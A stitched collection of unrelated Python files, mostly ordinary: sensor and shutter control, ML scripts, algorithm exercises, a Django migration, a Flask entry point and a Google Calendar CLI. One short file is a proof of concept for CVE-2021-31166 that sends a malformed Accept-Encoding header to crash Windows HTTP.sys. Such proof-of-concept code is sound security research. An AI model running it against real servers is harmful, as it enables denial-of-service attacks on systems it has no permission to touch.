        self.threadlicht.start()

    # Polling loop for the temperature sensor.
    def loop_temperatuursensor(self):
        x = True
        unit2 = self.eenheden[1]  # index 1 is the temperature unit
        y = 0
        while x:
            for i in range(0, 61):
                print(y, "t")
                # Automatic or manual screen control, per the dashboard switch.
                if self.ontvang_temp_switch() == True:
                    self.automatisch()
                else:
                    self.handmatig()
                # Refresh the reading and graph once per configured period.
                if y == self.ontvang_temp_frequentie() - 1:
                    unit2.stuur_sensor_waarde()
                    self.dashboard.temperatuursensor.grafiek.variabele = unit2.waarde
                    y = 0
                    sleep(1)
                y += 1
                sleep(1)
            # Persist all sensor values after each pass of the inner loop.
            self.sla_waarde_op()

    # Polling loop for the light sensor.
    def loop_lichtsensor(self):
        x = True
        unit1 = self.eenheden[0]  # index 0 is the light unit
        while x:
            for i in range(0, self.ontvang_licht_frequentie()):
                print(i, "l")
                if self.ontvang_licht_switch() == True:
                    self.automatisch()
                else:
                    self.handmatig()
                # Refresh the reading/graph at the end of each period.
                if i == self.ontvang_licht_frequentie() - 1:
                    unit1.stuur_sensor_waarde()
                    self.dashboard.lichtsensor.grafiek.variabele = unit1.waarde
                    sleep(1)
            x = True
            sleep(1)

    """
    Fetch the upper-limit value of the temperature sensor from the dashboard.
    :return: the temperature sensor's upper limit
    """
    def ontvang_temp_bovengrens(self):
        return self.dashboard.temperatuursensor.bovengrens

    """
    Fetch the polling frequency of the temperature sensor from the dashboard.
    :return: the temperature sensor's frequency
    """
    def ontvang_temp_frequentie(self):
        return self.dashboard.temperatuursensor.frequentie

    """
    Fetch the manual/automatic switch value of the temperature sensor from the dashboard.
    :return: the temperature sensor's switch value
    """
    def ontvang_temp_switch(self):
        return self.dashboard.temperatuursensor.switch

    """
    Fetch the roll-up/roll-out button value of the temperature sensor from the dashboard.
    :return: the temperature sensor's roll-up/roll-out value
    """
    def ontvang_temp_oprollen(self):
        return self.dashboard.temperatuursensor.oprollen

    """
    Fetch the upper-limit value of the light sensor from the dashboard.
    :return: the light sensor's upper limit
    """
    def ontvang_licht_bovengrens(self):
        return self.dashboard.lichtsensor.bovengrens

    """
    Fetch the polling frequency of the light sensor from the dashboard.
    :return: the light sensor's frequency
    """
    def ontvang_licht_frequentie(self):
        return self.dashboard.lichtsensor.frequentie

    """
    Fetch the manual/automatic switch value of the light sensor from the dashboard.
    :return: the light sensor's switch value
    """
    def ontvang_licht_switch(self):
        return self.dashboard.lichtsensor.switch

    """
    Fetch the roll-up/roll-out button value of the light sensor from the dashboard.
    :return: the light sensor's roll-up/roll-out value
    """
    def ontvang_licht_oprollen(self):
        return self.dashboard.lichtsensor.oprollen

    # In automatic mode: compare each sensor value against its upper limit
    # to open or close the roller shutter automatically.
    def automatisch(self):
        unit1 = self.eenheden[0]
        unit2 = self.eenheden[1]
        if self.ontvang_licht_switch() == True:
            if unit1.waarde > self.ontvang_licht_bovengrens():
                unit1.open_scherm()
                self.dashboard.lichtsensor.uitrollenFunc()
            elif unit1.waarde <= self.ontvang_licht_bovengrens():
                unit1.sluit_scherm()
                self.dashboard.lichtsensor.oprollenFunc()
        if self.ontvang_temp_switch() == True:
            if unit2.waarde > self.ontvang_temp_bovengrens():
                unit2.open_scherm()
                self.dashboard.temperatuursensor.uitrollenFunc()
            elif unit2.waarde <= self.ontvang_temp_bovengrens():
                unit2.sluit_scherm()
                self.dashboard.temperatuursensor.oprollenFunc()

    # In manual mode: react to the dashboard buttons to open or close
    # the roller shutter by hand.
    def handmatig(self):
        unit1 = self.eenheden[0]
        unit2 = self.eenheden[1]
        if self.ontvang_licht_switch() == False:
            if self.ontvang_licht_oprollen() == True:
                unit1.open_scherm()
            else:
                unit1.sluit_scherm()
        if self.ontvang_temp_switch() == False:
            if self.ontvang_temp_oprollen() == True:
                unit2.open_scherm()
            else:
                unit2.sluit_scherm()
|
#encoding:gbk
# NOTE: Python 2 source (uses the `print` statement).
# On win32 platforms __file__ holds the full path;
# on Linux it is just the file name.
print __file__
# 导入必要的模块
from gcforest.gcforest import GCForest
def init():
    """Load the train/test splits from ``subfile_{1,2}_{train,test}.csv``.

    Each CSV row is ``label,feat1,feat2,...``.  Returns
    ``(x_train, y_train, x_test, y_test)`` where each ``x_*`` entry is the
    feature list of one sample and each ``y_*`` entry is that sample's label
    string.

    Fixes versus the original:
    - features are grouped one list per row instead of being flattened into a
      single long list (the flat list had no sample structure);
    - the trailing newline is stripped, so the last feature of a row no longer
      carries a ``'\\n'``;
    - blank lines are skipped.
    """
    x_train, y_train = [], []
    x_test, y_test = [], []
    for x in range(1, 3):
        with open('./subfile_' + str(x) + '_train.csv', mode='r', encoding='utf8') as fpto_train:
            for row in fpto_train:
                line = row.strip().split(',')
                if not line[0]:
                    continue
                y_train.append(line[0])
                x_train.append(line[1:])
        with open('./subfile_' + str(x) + '_test.csv', mode='r', encoding='utf8') as fpto_test:
            for row in fpto_test:
                line = row.strip().split(',')
                if not line[0]:
                    continue
                y_test.append(line[0])
                x_test.append(line[1:])
    return x_train, y_train, x_test, y_test
def get_toy_config():
    """Build a small demo gcForest cascade configuration.

    The cascade uses four base learners per layer (XGBoost, random forest,
    extra trees, logistic regression), at most 100 layers, 3 output classes,
    and stops early after 3 layers without accuracy improvement.
    """
    cascade = {
        "random_state": 0,                # 0 or 1
        "max_layers": 100,                # a "layer" is a cascade level
        "early_stopping_rounds": 3,
        "n_classes": 3,
        "estimators": [
            {"n_folds": 5, "type": "XGBClassifier", "n_estimators": 10,
             "max_depth": 5, "objective": "multi:softprob", "silent": True,
             "nthread": -1, "learning_rate": 0.1},
            {"n_folds": 5, "type": "RandomForestClassifier",
             "n_estimators": 10, "max_depth": None, "n_jobs": -1},
            {"n_folds": 5, "type": "ExtraTreesClassifier",
             "n_estimators": 10, "max_depth": None, "n_jobs": -1},
            {"n_folds": 5, "type": "LogisticRegression"},
        ],
    }
    return {"cascade": cascade}
def train():
    """Fit a gcForest on the training split and predict on the test split."""
    x_train, y_train, x_test, y_test = init()
    # GCForest takes the config dict produced by get_toy_config().
    gc = GCForest(get_toy_config())
    # Concatenated per-estimator probabilities from the last cascade layer.
    X_train_enc = gc.fit_transform(x_train, y_train)
    # Predictions on the held-out split.
    y_pred = gc.predict(x_test)
if __name__ == '__main__':
    # Fix: init() was called separately before train(), but train() loads the
    # data itself — every CSV was read from disk twice for no benefit.
    train()
|
from data_structures_algorth.challenge_stack_and_queue.stack_queue import Queue, QueueIsEmptyException
class AnimalShelter:
    """A first-in-first-out shelter that only accepts dogs and cats."""

    def __init__(self):
        """Create one FIFO queue per accepted species."""
        self.dog = Queue()
        self.cat = Queue()

    def enqueue(self, animal):
        """Admit *animal* ('dog' or 'cat') into its species queue.

        Raises a generic Exception for any other species.
        """
        if animal == 'dog':
            self.dog.enqueue('dog')
        elif animal == 'cat':
            self.cat.enqueue('cat')
        else:
            raise Exception('No other animals are allowed!!')

    def dequeue(self, pref='none'):
        """Release the longest-waiting animal of the preferred species.

        Returns None when *pref* is neither 'dog' nor 'cat'; raises
        QueueIsEmptyException when the preferred queue is empty.
        """
        if pref == 'dog':
            if not self.dog.front:
                raise QueueIsEmptyException('Sorry there are no dogs waiting in our shelter')
            return self.dog.dequeue()
        if pref == 'cat':
            if not self.cat.front:
                raise QueueIsEmptyException('Sorry there are no cats waiting in our shelter')
            return self.cat.dequeue()
        return None
if __name__ == '__main__':
    # Smoke-test: two dogs then two cats, FIFO within each species.
    shelter = AnimalShelter()
    shelter.enqueue('dog')
    shelter.enqueue('dog')
    shelter.enqueue('cat')
    shelter.enqueue('cat')
    print(shelter.dog.front.value)
    print(shelter.dog.rear.value)
    print(shelter.cat.front.value)
    print(shelter.cat.rear.value)
    shelter.dequeue('cat')
    shelter.dequeue('cat')
    # print(shelter.cat.front.value)
    # NOTE(review): the cat queue is empty by now, so the next call raises
    # QueueIsEmptyException — presumably a deliberate demo of the error path.
    print(shelter.dequeue('cat'))
import matplotlib
matplotlib.use('Agg')
import os
import datetime
import time
import sqlite3
import pywt
from pylab import *
import fnmatch, gzip, os, re, sys, time
def approx(x, wavelet, level):
    """Reconstruct the level-*level* approximation of signal *x*.

    Decomposes *x* with the given wavelet, keeps only the coarsest
    approximation coefficients, and reconstructs them back to len(x) samples.
    """
    coeffs = pywt.wavedec(x, wavelet, level=level)
    return pywt.upcoef('a', coeffs[0], wavelet, level, take=len(x))
if __name__=="__main__":
    # NOTE: Python 2 source (print statements, `except Exception,e` syntax).
    # Walk the sqlite data tree for one specific circuit database, pull one
    # month of wattage readings, and wavelet-decompose the series.
    for (dirpath,dirnames,filenames) in os.walk('/home/apan/sqllite/ml00'):
        print "*************************************************************************************************"
        for _file in filenames:
            if _file=="ml00_0_2011.db":
                print "FOUND====>"+ dirpath+"/"+_file
                # File name layout: <site>_<circuit>_<year>.db
                cktstart=_file.find("_")
                cktend=_file.rfind("_")
                site=_file[0:cktstart]
                print "site="+site
                ckt=_file[cktstart+1:cktend]
                print "circuit="+ckt
                tableend=_file.rfind(".db")
                _table=_file[0:tableend]
                print "tablename="+_table
                yrstart=_file.rfind("_")
                yrend=_file.rfind(".")
                yr=_file[yrstart+1:yrend]
                try:
                    conn=sqlite3.connect(dirpath+"/"+_file)
                    c=conn.cursor()
                    # Previous timestamp for duplicate detection; seeded with a
                    # value no real timestamp can equal.
                    prev="0123456789z"
                    curr=""
                    d=[]
                    #cmd="select ts,watts from hour_res_watts where ts between '2011-02-01' and '2011-02-28'"
                    cmd="select timestamp,watts from ml00_0_2011 where timestamp between '2011-02-01' and '2011-02-28' order by timestamp"
                    for (ts,w) in c.execute(cmd):
                        curr=str(ts)
                        if curr==prev:
                            print "WARNING: Duplicate timestamp detected:"+str(ts)
                        else:
                            d.append(w)
                        prev=curr
                    conn.close()
                    conn=None
                except Exception,e:
                    print e
                print "len(d)="+str(len(d))
                # 10-level Daubechies-2 wavelet decomposition of the series.
                coeffs=pywt.wavedec(d, 'db2', level=10)
                print "len(cA)="+str(len(coeffs[0]))
                #_d=approx(d,'db2',13)
                #print "len(_d)="+str(len(_d))
                #N=len(_d)
                #t=arange(0,1,1./N)
                #x=_d
                #plot(t,x)
                #ylim(0,max(_d))
                #savefig('db2_signal_onemonthspan_level13from3secres.pdf')
|
# https://www.codewars.com/kata/54df2067ecaa226eca000229
def f(n):
    """Return the sum 1 + 2 + ... + n for a positive integer n, else None.

    Fix: uses integer arithmetic (n * (n + 1) // 2) instead of float division
    plus round(), which silently loses precision once n exceeds 2**53.
    """
    if isinstance(n, int) and n > 0:
        return n * (n + 1) // 2
    return None
|
from gurobipy import *
import numpy as np
def dist(loc, i, j):
    """Euclidean distance between worksite *i* and worksite *j* of *loc*."""
    delta = np.array(loc[i]) - np.array(loc[j])
    return np.linalg.norm(delta)
# Create a new model
m = Model("Minimizing the Maximum Within-Block Distance")

# Locations of worksites as (x, y) coordinates.
loc = [[277, 302], [340, 304], [432, 281], [463, 171], [467, 154], [573, 225], [481, 237]
, [455, 276], [501, 347], [417, 362], [367, 383], [366, 411], [472, 388], [476, 420], [563, 492],
[606, 334], [631, 367], [673, 405], [721, 374], [710, 401], [402, 482]]
s = len(loc)
# prespecify the number of clusters desired
k = 5
# Binary variables: vv[i, w] == 1 iff site i is assigned to cluster w;
# dd is the maximum within-cluster distance being minimized.
vv = m.addVars(s, k, vtype=GRB.BINARY)
dd = m.addVar(vtype = GRB.INTEGER, name = "minimax dist")
# Set Objective
obj = LinExpr(dd)
m.setObjective(obj, GRB.MINIMIZE)
# Add constraints
m.addConstr(dd, GRB.GREATER_EQUAL, 0)
# If sites i and j share cluster w then dd >= dist(i, j):
#   dist*(vv[i,w] + vv[j,w]) - dd <= dist  <=>  dd >= dist*(vv[i,w]+vv[j,w]-1)
for w in range(k):
    for i in range(s):
        for j in range(i+1, s):
            expr = dist(loc, i, j)*(vv[i, w] + vv[j, w]) - dd
            m.addConstr(expr, GRB.LESS_EQUAL, dist(loc, i, j))
# Every site must belong to exactly one cluster.
for i in range(s):
    expr = vv.sum(i, '*')
    m.addConstr(expr, GRB.EQUAL, 1)
# Optimize model
m.optimize()
for v in m.getVars():
    print('%s %g' % (v.varName, v.x))
print('Obj: %g' % m.objVal)
|
import torch
import VGG
from model import *
from datasets import *
from torchvision.utils import save_image,make_grid
import os
from PIL import Image
os.environ['CUDA_VISIBLE_DEVICES'] = "3"
def test(args):
    """Stylize one content image with one style image and save the result.

    Loads the truncated VGG encoder and the trained bilateral model from their
    checkpoints, extracts features from half-resolution copies of both images,
    and writes ``<output_file>output.jpg``.
    """
    device = torch.device("cuda")

    preprocess = transforms.Compose([
        transforms.Resize((512, 512), Image.BICUBIC),
        transforms.ToTensor()
    ])
    cont_img = preprocess(Image.open(args.cont_img_path).convert('RGB'))
    style_img = preprocess(Image.open(args.style_img_path).convert('RGB'))
    # Half-resolution copies feed the feature extractor.
    low_cont = resize(cont_img, cont_img.shape[-1] // 2).to(device)
    low_style = resize(style_img, style_img.shape[-1] // 2).to(device)
    cont_img = cont_img.to(device)

    # VGG encoder truncated to its first 31 children.
    vgg = VGG.vgg
    vgg.load_state_dict(torch.load(args.vgg_checkpoint))
    encoder = VGG.Net(nn.Sequential(*list(vgg.children())[:31])).to(device)

    model = Model().to(device)
    model.load_state_dict(torch.load(args.model_checkpoint))
    model.eval()

    cont_feat = encoder.encode_with_intermediate(low_cont.unsqueeze(0))
    style_feat = encoder.encode_with_intermediate(low_style.unsqueeze(0))
    coeffs, output = model(cont_img.unsqueeze(0), cont_feat, style_feat)
    save_image(output, args.output_file + 'output.jpg', normalize=True)
if __name__=='__main__':
    import argparse
    parser = argparse.ArgumentParser(description='Joint Bilateral learning')
    parser.add_argument('--cont_img_path', type=str, required=True, help='path to content images')
    parser.add_argument('--style_img_path', type=str, required=True, help='path to style images')
    # Fix: the two help texts below were copy-pasted from --style_img_path
    # and described the wrong options.
    parser.add_argument('--vgg_checkpoint', type=str, default="./checkpoints/vgg_normalised.pth",
                        help='path to the pretrained VGG checkpoint')
    parser.add_argument('--model_checkpoint', type=str, required=True,
                        help='path to the trained model checkpoint')
    parser.add_argument('--output_file', type=str, default='./output/')
    params = parser.parse_args()
    print('PARAMS:')
    print(params)
    test(params)
# Scatter-plot the recorded 3-D positions
# (original Chinese header comment: "draw a triangular spiral").
from mpl_toolkits import mplot3d
import matplotlib.pyplot as plt
import numpy as np
import pickle

# Load the recorded positions; each entry is indexed as (x, y, z).
f = open('pos_recoder_0.pkl', 'rb')
pos_recoder = pickle.load(f)

ax = plt.axes(projection='3d')
xdata = [a[0] for a in pos_recoder]
ydata = [a[1] for a in pos_recoder]
# z is negated — presumably the recorder uses a downward-positive axis; confirm.
zdata = [-a[2] for a in pos_recoder]
ax.scatter(xdata, ydata, zdata, linewidths=1)
# # 3-D line example data
# zline = np.linspace(0, 15, 1000)
# xline = np.sin(zline)
# yline = np.cos(zline)
# ax.plot3D(xline, yline, zline, 'gray')
# # 3-D scatter example data
# zdata = 15 * np.random.random(100)
# xdata = np.sin(zdata) + 0.1 * np.random.randn(100)
# ydata = np.cos(zdata) + 0.1 * np.random.randn(100)
# ax.scatter(xdata, ydata, zdata, linewidths=zdata)
plt.show()
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-08-04 12:18
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 1.9.5; prefer new migrations over hand edits.

    dependencies = [
        ('assets', '0006_auto_20160801_1540'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='networkdevice',
            name='firmware',
        ),
        migrations.AddField(
            model_name='server',
            name='kernel',
            # verbose_name is Chinese for "kernel".
            field=models.CharField(blank=True, max_length=128, null=True, verbose_name='内核'),
        ),
        migrations.AlterField(
            model_name='idc',
            name='contacts_phone',
            # verbose_name is Chinese for "contact phone number".
            # NOTE(review): an IntegerField cannot store leading zeros or '+';
            # phone numbers usually use CharField — would need a follow-up migration.
            field=models.IntegerField(verbose_name='联系人电话'),
        ),
    ]
|
"""
solution
['AX', 'AY', 'AZ', 'BX', 'BY', 'BZ', 'CX', 'CY', 'CZ']
"""
# 1. Squares of the even numbers between 1 and 100.
result = [n * n for n in range(2, 101, 2)]
print(result)
# 2. Every two-letter combination taking one letter from each string.
string1 = 'ABC'
string2 = 'XYZ'
result = [a + b for a in string1 for b in string2]
print(result) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
RESTful API Python 3 Flask server
"""
import os
import pretty_errors
from restapi.confs import PRODUCTION
from restapi.server import create_app
from restapi.utilities.logs import log
# Connection internal to containers, proxy handle all HTTPS calls
# We may safely disable HTTPS on OAUTHLIB requests
if PRODUCTION:
    # http://stackoverflow.com/a/27785830/2114395
    os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'

# Listen on all interfaces; TLS is terminated by the proxy in front.
BIND_INTERFACE = "0.0.0.0"

#############################
# BE FLASK
app = create_app(name='REST_API')

if __name__ == "__main__":
    # Development entry point only; production serving is handled elsewhere.
    log.debug("Server running (w/ {})", pretty_errors.__name__)
    app.run(host=BIND_INTERFACE, threaded=True)
|
class AttributeDictionary(object):
    """Dict wrapper that exposes keys as attributes.

    Nested plain dicts are wrapped on read, so ``d.a.b`` works.  The backing
    dict is stored via ``object.__setattr__`` to avoid triggering the
    attribute hooks defined below.
    """

    def __init__(self, *args, **kwargs):
        # A single positional dict takes precedence; kwargs are ignored in
        # that case (NOTE(review): possibly surprising — confirm intended).
        d = kwargs
        if args:
            d = args[0]
        super(AttributeDictionary, self).__setattr__("_dict", d)

    def __setattr__(self, name, value):
        # Every attribute write is redirected into the backing dict.
        self[name] = value

    def __getattr__(self, name):
        # Only invoked when normal attribute lookup fails; fall back to keys.
        if name in self.__dict__:
            return self.__dict__[name]
        try:
            return self[name]
        except KeyError:
            raise AttributeError("'%s' object has no attribute '%s'" % (self.__class__.__name__, name))

    def __setitem__(self, name, value):
        self._dict[name] = self._convert_value(value)

    def __getitem__(self, name):
        return self._convert_value(self._dict[name])

    def _convert_value(self, value):
        # Wrap nested plain dicts so attribute access recurses.
        if isinstance(value, dict) and not isinstance(value, AttributeDictionary):
            return AttributeDictionary(value)
        return value

    def copy(self):
        # Shallow copy of the backing dict.
        return self.__class__(self._dict.copy())

    def update(self, *args, **kwargs):
        # NOTE(review): bypasses __setitem__, so values are not converted
        # until they are read back.
        self._dict.update(*args, **kwargs)

    def items(self):
        return self._dict.items()

    def values(self):
        return self._dict.values()

    def keys(self):
        return self._dict.keys()

    def pop(self, *args, **kwargs):
        return self._dict.pop(*args, **kwargs)

    def get(self, *args, **kwargs):
        # NOTE(review): unlike __getitem__, does not wrap nested dicts.
        return self._dict.get(*args, **kwargs)

    def __repr__(self):
        return self._dict.__repr__()

    def __unicode__(self):
        # Python 2 relic; dicts have no __unicode__ on Python 3.
        return self._dict.__unicode__()

    def __str__(self):
        return self._dict.__str__()

    def __iter__(self):
        return self._dict.__iter__()

    def __getstate__(self):
        # Pickle only the backing dict...
        return self._dict

    def __setstate__(self, state):
        # ...and restore it without invoking the __setattr__ hook.
        super(AttributeDictionary, self).__setattr__("_dict", state)
|
# An O(n^2) solution
class Solution(object):
    def removeDuplicateLetters(self, s):
        """
        :type s: str
        :rtype: str

        Remove duplicate letters so every letter appears once and the result
        is lexicographically smallest.  Greedy scan: a character is appended
        when it is forced (its last remaining occurrence, or no smaller
        character appears before the next non-removable one); otherwise it is
        deferred to a later occurrence.  ``counter[c] is None`` marks a letter
        already emitted.
        """
        if s == '':
            return ''
        ord_a = ord('a')
        # NOTE We redefine `s` here.
        s = [ord(x) - ord_a for x in s]
        counter = [0]*26
        for x in s:
            counter[x] += 1
        rv = []
        for i, c in enumerate(s):
            if counter[c] is None:
                # This character has been processed
                continue
            assert counter[c] >= 1
            counter[c] -= 1
            if counter[c] == 0:
                # The current character is not removeable. We have no other
                # choices.
                rv.append(c)
                counter[c] = None
                continue
            # The current character is removeable. We find the first character
            # to the right of the current character such that it is NOT
            # removeable and it is lexicographically larger than or equal to
            # the current character. If there is a lexicographically smaller
            # character in-between, than we will not remove the current
            # character.
            j = i + 1
            smaller_found = False
            while j < len(s):
                c2 = s[j]
                if counter[c2] is None:
                    # c2 has been processed, ignore it.
                    j += 1
                    continue
                assert counter[c2] >= 1
                if c2 < c:
                    # Found the smaller
                    smaller_found = True
                    break
                # c2 >= c
                if counter[c2] == 1:
                    # This character is not removeable and it is
                    # lexicographically larger/equal
                    break
                counter[c2] -= 1
                j += 1
            # Recover the counts of character in s[i+1:j]
            for k in range(i+1, j):
                c2 = s[k]
                if counter[c2] is not None:
                    counter[c2] += 1
            if not smaller_found:
                # Must use the current character
                rv.append(c)
                counter[c] = None
        return ''.join(chr(x + ord_a) for x in rv)
from collections import Counter
# O(n) solution using stack
# O(n) solution using stack
class StackSolution(object):
    def removeDuplicateLetters(self, s):
        """Return the lexicographically smallest subsequence of *s* that
        contains every distinct character exactly once.

        Scan left to right keeping the result as lexicographically ascending
        as possible: the last kept character may be dropped whenever it is
        larger than the incoming one and is known to occur again later.
        """
        remaining = Counter(s)
        kept = []          # characters currently kept, in order (the stack)
        on_stack = set()   # membership mirror of `kept`
        for ch in s:
            remaining[ch] -= 1
            if ch in on_stack:
                # Already placed; a later, better position was not needed.
                continue
            while kept and kept[-1] > ch and remaining[kept[-1]]:
                # The top is larger than `ch` and reappears later, so it is
                # safe to pop it and re-add it at a better position.
                on_stack.discard(kept.pop())
            kept.append(ch)
            on_stack.add(ch)
        return ''.join(kept)
def test():
    """Check BOTH implementations against the known examples.

    Fix: the loop variable was ignored — ``Solution()`` was instantiated in
    every assertion, so ``StackSolution`` was never actually tested.
    """
    for S in (Solution, StackSolution):
        assert S().removeDuplicateLetters('bcabc') == 'abc'
        assert S().removeDuplicateLetters('cbacdcbc') == 'acdb'
        assert S().removeDuplicateLetters('ccacbaba') == 'acb'
|
def startCommand(bot, update):
    """Reply to the /start command with a greeting message."""
    greeting = 'Привіт 👋🏿:, человек 😑 '
    bot.send_message(chat_id=update.message.chat_id, text=greeting)
|
import random
import string
robot_names = set()  # names already handed out, guaranteeing uniqueness


class Robot:
    """A robot with a unique random name of two letters plus three digits."""

    def __init__(self):
        random.seed()
        self.name = self.generate_name()

    def generate_name(self):
        """Generate, register and return a name no robot has used yet.

        Fix: the original loop condition was inverted
        (``while self.name not in robot_names``), so a colliding name was
        returned without being regenerated; now we retry until the candidate
        is genuinely unused.
        """
        while True:
            letters = ''.join(random.sample(string.ascii_uppercase, 2))
            digits = ''.join(random.sample(string.digits, 3))
            name = f'{letters}{digits}'
            if name not in robot_names:
                robot_names.add(name)
                self.name = name
                return name

    def reset(self):
        """Give the robot a fresh unique name."""
        self.__init__()
|
# Axel '0vercl0k' Souchet - May 16 2021
import requests
import argparse
def main():
    """Send the malformed Accept-Encoding header that triggers the HTTP.sys UAF."""
    parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
    parser.add_argument('--target', required = True)
    args = parser.parse_args()
    r = requests.get(f'http://{args.target}/', headers = {
        'Accept-Encoding': 'doar-e, ftw, imo, ,',
    })
    print(r)


if __name__ == '__main__':
    # Fix: guard the entry point so importing this module no longer fires
    # the PoC request as a side effect.
    main()
from __future__ import print_function
import httplib2
import os
from apiclient import discovery
from oauth2client import client
from oauth2client import tools
from oauth2client.file import Storage
import datetime
import glob,pickle,random
import nagdefs as nd
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
flags = None
# If modifying these scopes, delete your previously saved credentials
# at ~/.credentials/calendar-python-quickstart.json
#SCOPES = 'https://www.googleapis.com/auth/calendar.readonly'
SCOPES = 'https://www.googleapis.com/auth/calendar'
CLIENT_SECRET_FILE = 'client_secret.json'
#APPLICATION_NAME = 'Google Calendar API Python Quickstart'
APPLICATION_NAME = 'NagMe'
def cli():
    """Interactive NagMe command loop.

    NOTE: Python 2 source (``raw_input``).  The current username is cached in
    the ``.user`` pickle; per-user profiles live in ``.<user>`` pickles.
    Connects to the Google Calendar API and dispatches single-letter commands
    until the user quits.
    """
    print("Welcome to the NagMe Command Line Interface.\n")
    try:
        user=pickle.load(open(".user","rb"))
        print("Current user: "+user)
    except:
        user=raw_input("Enter a username: ")
        fu = open(".user","wb")
        pickle.dump(user,fu,1)
        fu.close()
    nagcal = nd.getCalendar(user=user)
    creds = nd.get_credentials(user=user)
    http = creds.authorize(httplib2.Http())
    serv = discovery.build('calendar','v3',http=http)
    cals = serv.calendarList().list().execute()['items']
    # Hide NagMe's own calendar from the user-selectable list.
    for nc in cals:
        if nc["id"]==nagcal["id"]:
            cals.remove(nc)
    try:
        userprof = pickle.load(open("."+user,"rb"))
    except:
        # First run for this user: create a profile and register it.
        userprof = nd.Profile(user,nagcal)
        os.system("echo "+user+">>.profiles")
    while True:
        print("\nEnter one of the following commands:\n\n"+
            "l : List all available calendars \n"+
            "c : List currently-selected calendars \n"+
            "s : Select calendars \n"+
            "a : Add task \n"+
            "u : Switch user \n"+
            "q : Quit \n\n")
        command = raw_input("Command: ")
        if command=="c":
            listscals(userprof.scals)
        elif command=="l":
            listcals(cals)
        elif command=="s":
            userprof.scals=selectcals(userprof.scals,cals)
            userprof.save()
        elif command=="a":
            userprof.tasks.append(addtask(userprof.scals,nagcal,user))
            userprof.save()
        elif command=="u":
            # Switch user: persist the new name and reload everything.
            user = raw_input("Enter username: ")
            fu = open(".user","wb")
            pickle.dump(user,fu,1)
            fu.close()
            nagcal = nd.getCalendar(user=user)
            creds = nd.get_credentials(user=user)
            http = creds.authorize(httplib2.Http())
            serv = discovery.build('calendar','v3',http=http)
            cals = serv.calendarList().list().execute()['items']
            for nc in cals:
                if nc["id"]==nagcal["id"]:
                    cals.remove(nc)
            print("\nWelcome, "+user)
            try:
                userprof = pickle.load(open("."+user,"rb"))
            except:
                userprof = nd.Profile(user,nagcal)
        elif command=="q":
            break
        else:
            print("I'm sorry, I didn't get that.")
def listcals(cals):
    """Print an indexed list of the available calendars."""
    print("\nAvailable calendars:\n")
    for idx, cal in enumerate(cals):
        print('[%02d]' % idx, cal["summary"])
def listscals(scals):
    """Print the currently-selected calendars, or a placeholder if none."""
    print("\n")
    if not scals:
        print("No calendars currently selected.")
        return
    print("Currently-selected calendars:")
    for cal in scals:
        print(cal["summary"])
def selectcals(scals,cals):
    """Interactively add calendars from *cals* to the selection *scals*.

    NOTE: Python 2 (``raw_input``).  Loops until the user presses Enter with
    at least one calendar selected; returns the updated selection.

    NOTE(review): pressing Enter with nothing selected also falls through to
    the ``int('')`` parse below, printing the invalid-number message on top of
    the must-select warning — confirm whether that double message is intended.
    """
    listcals(cals)
    listscals(scals)
    while True:
        okstat = raw_input("Enter the number of the calendar you would"+
            " like to add to the watch list, or hit 'Enter' to continue: ")
        if okstat=='':
            if len(scals)>0:
                break
            else:
                print("You must select at least one calendar to continue.")
        try:
            ncal = int(okstat)
            scals.append(cals[ncal])
            listscals(scals)
            print("\n")
        except:
            print("Invalid number entered. Please try again.")
    return scals
def addtask(scals,nagcal,user):
    """Interactively build an nd.Task and fill the nag calendar with it.

    Computes the local UTC offset, prompts for deadline and notification
    preferences, constructs the Task, and calls its assign() method.
    """
    # Local-time UTC offset in whole hours, converted to a timedelta (dtz).
    tzh = int(round((datetime.datetime.utcnow()
        -datetime.datetime.now()).total_seconds()/3600.0))
    if tzh>0:
        dtz = datetime.datetime(1970,1,1,0,0,0)-datetime.datetime(1970,1,1,abs(tzh),0,0)
    else:
        dtz = datetime.datetime(1970,1,1,abs(tzh),0,0)-datetime.datetime(1970,1,1,0,0,0)
    name=raw_input("\nEnter a name for the task: ")
    deadline = cliDialogT("Enter a deadline in the format YYYY-MM-DD/HH:MM:SS : ",dtz)
    nid = cliDialogAB("Will advance notice be given in weeks (w) or days (d)? ","d","w")
    nadv = cliDialogN("How many weeks or days in advance would you like to be notified?")
    workweek = cliDialogAB("Weekdays okay? (y/n): ","y","n")
    weekend = cliDialogAB("Weekends okay? (y/n): ","y","n")
    # At least one day class must be allowed; force weekends otherwise.
    if not workweek and not weekend:
        print("You have to do it SOMETIME asshole, so you're getting weekend notifications.")
        weekend=True
    morns = cliDialogAB("Mornings okay? (y/n): ","y","n")
    eves = cliDialogAB("Evenings okay? (y/n): ","y","n")
    days = cliDialogAB("During the day okay? (y/n): ","y","n")
    # Same for times of day; force evenings otherwise.
    if not morns and not eves and not days:
        print("You have to do it SOMETIME asshole, so you're getting evening notifications.")
        eves=True
    nfreq = cliDialogN("How many notifications per week would you like?")
    print("Working....")
    task = nd.Task(name,deadline,nadv,workweek=workweek,weekend=weekend,workday=days,
        morning=morns,evening=eves,frequency_per_week=nfreq,notice_in_days=nid,
        cals = scals,calendarId=nagcal["id"],user=user)
    print("Filling your schedule.....")
    task.assign()
    print("Done!")
    return task
def cliDialogAB(prompt,optionA,optionB):
    """Ask *prompt* until the user types optionA or optionB.

    Returns True for optionA, False for optionB.
    """
    answer = raw_input(prompt)
    # Re-prompt until the reply is one of the two accepted strings.
    while answer not in (optionA, optionB):
        answer = raw_input("Please enter either "+optionA+" or "+optionB+": ")
    return answer == optionA
def cliDialogN(prompt):
    """Print *prompt*, then ask for input until it parses as an int.

    Returns the parsed integer.
    """
    print(prompt)
    ans = raw_input("Enter a number: ")
    while True:
        try:
            return int(ans)
        except ValueError:
            # Narrowed from a bare except: only a non-numeric reply is expected.
            ans = raw_input("Please enter a number: ")
def cliDialogT(prompt,dtz):
    """Prompt for a 'YYYY-MM-DD/HH:MM:SS' timestamp until one parses.

    dtz -- local-to-UTC offset (timedelta) forwarded to readinput.
    Returns the parsed datetime (shifted to UTC by readinput).
    """
    timestring = raw_input(prompt)
    while True:
        try:
            time = readinput(timestring,utcoffset=dtz)
